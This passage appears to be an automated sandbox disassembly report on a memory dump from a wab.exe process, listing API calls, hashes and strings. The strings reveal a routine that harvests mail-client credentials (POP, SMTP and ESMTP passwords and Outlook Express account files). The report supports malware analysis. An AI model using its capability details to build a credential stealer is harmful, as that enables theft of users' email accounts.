                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3831604043-0
                                                                                                                                                • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                  • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                • String ID: Arial
                                                                                                                                                • API String ID: 3853255127-493054409
                                                                                                                                                • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                  • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                  • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                  • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                  • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 145871493-0
                                                                                                                                                • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                  • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                  • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                  • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                • API String ID: 2238633743-192783356
                                                                                                                                                • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                  • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                  • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                • API String ID: 52435246-1534328989
                                                                                                                                                • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
                                                                                                                                                • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2565263379-0
                                                                                                                                                • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                • strlen.MSVCRT ref: 00406C52
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2315226746-0
                                                                                                                                                • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
